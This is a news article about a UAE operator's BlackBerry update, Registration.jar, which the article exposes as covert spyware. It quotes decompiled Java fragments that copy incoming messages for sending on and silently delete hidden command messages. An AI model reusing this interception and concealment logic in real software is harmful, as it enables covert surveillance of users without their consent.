Feeds

BlackBerry snoopers can explain everything

Etisalat downloads smoke and mirrors

5 things you didn’t know about cloud backup

Etisalat, the United Arab Emirates operator who recently pushed snooping software to its BlackBerry-using customers, has explained that it's all in the interests of network compatibility.

But its claim that appear fall down at the slightest scrutiny - or at least with a glance at the code in question.

The patch, which was sent out earlier this week, includes a file called Registration.jar, which appears to emanate from snooping-software specialist SS8. Registration.jar includes Java code clearly intended to intercept and make copies of received e-mail and text messages, despite assurances from Etisalat that the package is "required for service enhancements particularly for issues identified related to the handover between 2G to 3G network coverage areas".

Users first noticed suspicious activity when their BlackBerrys started experiencing heavy battery drain, which Etisalat attributes to "a slight technical fault while upgrading the software of these devices". Security researchers claim it's actually down to the snooping software repeatedly trying to register with a central server. The statement from Etisalat also claims that users experiencing problems - the operator admits to receiving 300 complaints - can dial 101 to have the upgrade reversed.

That may well be true: the software Etisalat is distributing isn't supposed to be reporting on every user. It is designed to be remotely triggered on specific handsets, before commencing its task of copying off that customer's messages to servers within the network operator.

The Register has been taking a look at Registration.jar, suitably decompiled, and Java developers might be interested in this snippet:

public void messagesAdded(FolderEvent fevent)
  {
  sentmsg++;
  if(fevent.getType() == 1)
  {
    Message msg = fevent.getMessage();
    try
    {
    String subject = msg.getSubject();
    if(subject != null && (subject.indexOf("I: response") != -1 || subject.indexOf("I:FW:") != -1))
     return;
    }
    catch(Exception e) { }
    MsgOut msgout = new MsgOut(log, this, msg, true);
    msgout.start();
    } else
      if(fevent.getType() != 2);
    }

...which is clearly related to roaming between 2G and 3G networks. Or this section, which (at a glance) would appear to be code devoted to removing received instructions (originating from "Customer Services") before the user gets a chance to see them:

if (fpin != null && fnam != null
&& fpin.equalsIgnoreCase("Customer Service")
  && fnam.equalsIgnoreCase("Customer Service")
  && cmds.msgIsPIN(msg)) {
  String body = msg.getBodyText();
  try {
    msg.getFolder().deleteMessage(msg, true);
  } catch (Exception exception) {
    /* empty */
  }

...but that can't be true, so it's obviously about enhancing network coverage.

Remotely installing spyware on users' handsets is one thing, but we would expect the snoops to at least obfuscate their code, not to mention that Registration.jar includes a complete SMTP client: ideal for avoiding any interaction with the RIM servers over in Canada.

Etisalat reckons they have 145,000 BlackBerry users, which means that 105,000 of them (who didn't complain) may have got this snooping software installed and running, ready to receive that coded command to start intercepting messages when someone decides they're worth watching. ®

The essential guide to IT transformation

More from The Register

next story
6 Obvious Reasons Why Facebook Will Ban This Article (Thank God)
Clampdown on clickbait ... and El Reg is OK with this
So, Apple won't sell cheap kit? Prepare the iOS garden wall WRECKING BALL
It can throw the low cost race if it looks to the cloud
Time Warner Cable customers SQUEAL as US network goes offline
A rude awakening: North Americans greeted with outage drama
We need less U.S. in our WWW – Euro digital chief Steelie Neelie
EC moves to shift status quo at Internet Governance Forum
Google has spaffed more cash on lobbying this year than Big Cable
Don't worry, it'll be cheaper when they use drones
EE fails to apologise for HUGE T-Mobile outage that hit Brits on Friday
Customer: 'Please change your name to occasionally somewhere'
prev story

Whitepapers

Implementing global e-invoicing with guaranteed legal certainty
Explaining the role local tax compliance plays in successful supply chain management and e-business and how leading global brands are addressing this.
Endpoint data privacy in the cloud is easier than you think
Innovations in encryption and storage resolve issues of data privacy and key requirements for companies to look for in a solution.
Why cloud backup?
Combining the latest advancements in disk-based backup with secure, integrated, cloud technologies offer organizations fast and assured recovery of their critical enterprise data.
Consolidation: The Foundation for IT Business Transformation
In this whitepaper learn how effective consolidation of IT and business resources can enable multiple, meaningful business benefits.
High Performance for All
While HPC is not new, it has traditionally been seen as a specialist area – is it now geared up to meet more mainstream requirements?